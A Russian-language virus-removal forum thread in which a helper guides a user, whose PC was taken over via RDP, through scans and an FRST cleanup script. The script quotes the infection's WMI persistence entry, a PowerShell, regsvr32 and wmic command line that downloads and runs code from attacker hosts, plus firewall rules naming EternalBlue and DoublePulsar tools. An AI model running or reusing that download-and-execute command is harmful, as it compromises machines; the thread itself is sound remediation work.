кто-то установил RDP на пк

[ArCtic]

Здравствуйте! Кто-то установил RDP на пк. Помогите удалить все файлы того злоумышленника.

CollectionLog-2021.10.04-13.57.zip

[Sandor]

Здравствуйте!

 

Проблему опишите, пожалуйста, подробнее, в чем именно выражается.

 

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям.
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

[ArCtic]

Заметил на диске С: папку "левую" (уже удалилась после AV block remover) там, что-то про rdp было. Посмотрел в администрировании в пользователях пользователь новый, его удалил. Попытался касперского установить free  - не устанавливается. Поэтому решил к профессионалам обратиться.

CollectionLog-2021.10.04-14.32.zip AV_block_remove.log

[Sandor]

Теперь понятно

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

 

Файл

Цитата

C:\Users\MLP\desktop\aa_v3.exe

вам известен? Это тоже программа удалённого управления AmmyAdmin.

[ArCtic]

да, это мой амми админ

Addition.txt FRST.txt

[Sandor]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  SystemRestore: On
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
  HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {1a17073d-48c6-11e6-bdd0-364b50b7ef2d} - E:\SISetup.exe
  HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {83d7d827-00ff-11e9-8be5-364b50b7ef2d} - E:\HiSuiteDownLoader.exe
  HKU\S-1-5-21-3223088090-4183115797-3109842715-1000\...\MountPoints2: {d0bcfb0f-2905-11e6-b90f-d8cb8ae0fe7d} - "I:\Install MegaFon Internet.exe"
  2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\kz.exe
  2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass.exe
  2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\lsass2.exe
  2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\olly.exe
  2021-01-04 10:43 - 2021-01-04 10:43 - 000000000 ___SH () C:\ProgramData\script.exe
  2021-01-04 10:43 C:\Program Files (x86)\Zaxar
  2021-01-04 10:43 C:\Windows\boy.exe
  2021-01-04 10:43 C:\Windows\java.exe
  2021-01-04 10:43 C:\Windows\svchost.exe
  2021-01-04 10:43 C:\Windows\SysWOW64\Drivers\conhost.exe
  2021-01-04 10:43 C:\ProgramData\Driver Foundation Visions VHG
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"topx4\"",Filter="__EventFilter.Name=\"topx3\"::
  WMI:subscription\__EventFilter->topx3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 11000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
  WMI:subscription\CommandLineEventConsumer->topx4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.dasxost.com:8080/power.txt')||regsvr32 /u /s /i:http://185.26.115.40:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://185.26.115.144:8220/s.xsl"]
  WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
  FirewallRules: [{24F5AB21-FD6B-4800-88E4-AF6A887D4F97}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
  FirewallRules: [{0CC96BE1-E966-4ADE-B25B-80542EBADB5E}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
  FirewallRules: [{31732C49-DC53-4085-B207-84E186F421FE}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
  FirewallRules: [{2DAAC257-3DF8-4919-BAED-196D7A532C9A}] => (Allow) C:\ProgramData\WindowsTask\MicrosoftHost.exe => Нет файла
  FirewallRules: [{7BDFDB76-754B-4D35-93DD-B98F12A34D38}] => (Allow) C:\ProgramData\WindowsTask\AppModule.exe => Нет файла
  FirewallRules: [{45C49E5A-2858-41B4-81B0-A089019CB5D4}] => (Allow) C:\ProgramData\WindowsTask\AMD.exe => Нет файла
  FirewallRules: [{68DC5587-D66F-4512-B002-9788A6A41F00}] => (Allow) C:\ProgramData\RealtekHD\taskhostw.exe => Нет файла
  FirewallRules: [{E57F64A7-AA55-4488-A5D8-ECDB4003D773}] => (Allow) C:\ProgramData\rundll\system.exe => Нет файла
  FirewallRules: [{A9AD11A1-29A5-4A5C-91EA-F4527C1C8D63}] => (Allow) C:\ProgramData\rundll\rundll.exe => Нет файла
  FirewallRules: [{D90D92D7-4D88-4B2B-A141-916A875E0B54}] => (Allow) C:\ProgramData\rundll\Doublepulsar-1.3.1.exe => Нет файла
  FirewallRules: [{C583528B-9C13-45EA-A6AD-EC7613BD082B}] => (Allow) C:\ProgramData\rundll\Eternalblue-2.2.0.exe => Нет файла
  FirewallRules: [{16B70809-10D7-48CB-A52D-01D477548D3E}] => (Allow) LPort=9494
  FirewallRules: [{23908275-A1BE-41BE-8688-7D75BC4550F5}] => (Allow) LPort=9393
  FirewallRules: [{1339B6CC-2275-4060-9113-2C024E11A1E8}] => (Allow) LPort=9494
  FirewallRules: [{5FED84C7-E9C8-42EF-94DC-60E9BE8AE912}] => (Allow) LPort=9393
  EmptyTemp:
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

[ArCtic]

готово

Fixlog.txt

[Sandor]

Если проблема решена, в завершение:

 

1. Выполните процедуру, описанную на этой странице.
Ссылку на результат анализа приведите здесь, пожалуйста.

 

2.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

3.

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

[ArCtic]

1. https://defendium.info/aqs/qr_report.php?md5=7C78B99033D97376348B6BDB72C48B2D

2. V

3. ↓

SecurityCheck.txt

[Sandor]

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
Дата установки обновлений: 2018-04-30 09:14:55
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
Total Commander v.8.51 Внимание! Скачать обновления
WinRAR 5.31 (64-разрядная) v.5.31.0 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Google Chrome v.94.0.4606.61 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Google Chrome!^
Opera Stable 65.0.3467.78 v.65.0.3467.78 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Opera Stable 79.0.4143.50 v.79.0.4143.50 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
 

Особенно обратите внимание на Контроль учетных записей и постарайтесь установить все хотфиксы. Иначе рискуете снова заразиться.

 

Читайте Рекомендации после удаления вредоносного ПО

[akoK]

C:\Users\MLP\desktop\aa_v3.exe - удаленное управление сами ставили?

[thyrex]

04.10.2021 в 16:35, ArCtic сказал:

да, это мой амми админ

 

[akoK]

Ага, пропустил пост.